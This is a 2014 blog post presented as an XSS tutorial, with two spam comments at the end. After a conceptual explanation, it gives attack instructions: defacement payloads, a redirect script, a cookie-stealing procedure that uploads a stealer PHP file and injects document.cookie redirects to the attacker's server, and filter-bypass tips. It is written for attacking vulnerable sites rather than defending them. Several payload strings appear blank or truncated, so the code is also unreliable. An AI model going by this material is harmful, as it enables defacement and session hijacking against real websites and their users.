Monday, 25 August 2014

A complete Tutorial on XSS Attack

What is XSS Attack?

Cross-site scripting (XSS) is a code injection attack that allows an attacker to execute malicious JavaScript in another user's browser.The attacker does not directly target his victim. Instead, he exploits a vulnerability in a website that the victim visits, in order to get the website to deliver the malicious JavaScript for him. To the victim's browser, the malicious JavaScript appears to be a legitimate part of the website, and the website has thus acted as an unintentional accomplice to the attacker.
How JavaScript is injected?
This is the way for the attacker to run his malicious JavaScript in the victim's browser is to inject it into one of the pages that the victim downloads from the website. xss attack can be used in phishing attack by using iframe tag in xss payload.This can happen if the website directly includes user input in its pages, because the attacker can then insert a string that will be treated as code by the victim's browser.In the example below, a simple server-side script is used to display the latest comment on a website.

The consequences of malicious JavaScript

Among many other things, the ability to execute arbitrary JavaScript in another user's browser allows an attacker to perform the following types of attacks:
Cookie theft
The attacker can access the victim's cookies associated with the website using document.cookie, send them to his own server, and use them to extract sensitive information like session IDs.
The attacker can register a keyboard event listener usingaddEventListener and then send all of the user's keystrokes to his own server, potentially recording sensitive information such as passwords and credit card numbers.
The attacker can insert a fake login form into the page using DOM manipulation, set the form's action attribute to target his own server, and then trick the user into submitting sensitive information.
Although these attacks differ significantly, they all have one crucial similarity: because the attacker has injected code into a page served by the website, the malicious JavaScript is executed in the context of that website. This means that it is treated like any other script from that website: it has access to the victim's data for that website (such as cookies) and the host name shown in the URL bar will be that of the website. For all intents and purposes, the script is considered a legitimate part of the website, allowing it to do anything that the actual website can.
This fact highlights a key issue:
If an attacker can use your website to execute arbitrary JavaScript in another user's browser, the security of your website and its users has been compromised.
To emphasize this point, some examples in this tutorial will leave out the details of a malicious script by only showing <script>...</script>. This indicates that the mere presence of a script injected by the attacker is the problem, regardless of which specific code the script actually executes.

XSS Payloads:

Deface Methods 

Well now you understand how XSS works, we can explain some simple XSS deface methods, there
are many ways for defacing i will mention some of the best and most I used,

<html><body><IMG SRC=""></body></html>

the first one being IMG SCR, now for those of you who dont know HTML, IMG SCR is a tag, that
displays the IMAGE linked to it on the webpage.

ok now if u change the link to a valid picture link, and save it and run it you will see your deface page.let us say we have have found a Shoutbox, Comment box, or anything that shows your data after you submitted it you could insert the following to make the picture display on the page.

<IMG SRC="">

Ok it helps to make your picture big so it stands out and its clear the site got hacked.

Another method is using FLASH videos, its the same has the method below but a little more stylish deface.

that will execute the flash video linked to it.

Now a popup or a redirection

<script> "" )</script>

 Cookie Stealing

This is the best thing about XSS..

First Get your self a cookie stealer- from here 

ok now you have it save it has a .php file and upload to your server, remember to create the file 'log.txt' too
and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do.

ok now your gona want to insert this code.

window.location = ""+document.cookie


document.location = ""+document.cookie
now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen

the second one is more stealth.

Now it is the time to hijack the cookies = ""+document.cookie
 Filteration Bypassing 

Alot of sites may seem vulnerable but not executing the code..This will help you

Some common methods to bypass filteration is




that will do the same thing has <script>alert("XSS")</script> on a vulnerable server.

You can also try hexing or base64 encoding your data before you submit,

Please note its bad practice to use alert("XSS") to test for XSS, has ive known sites block the keyword XSS 

Some other ways to bypass filteration

<script type=text/javascript>alert("saurav")</script>


  1. Great blog created by you. I read your blog, its best and useful information. You have done a great work. Super blogging and keep it up.php jobs in hyderabad.

  2. • Nice and good article. It is very useful for me to learn and understand easily. Thanks for sharing your valuable information and time. Please keep updatingAzure Online Training Bangalore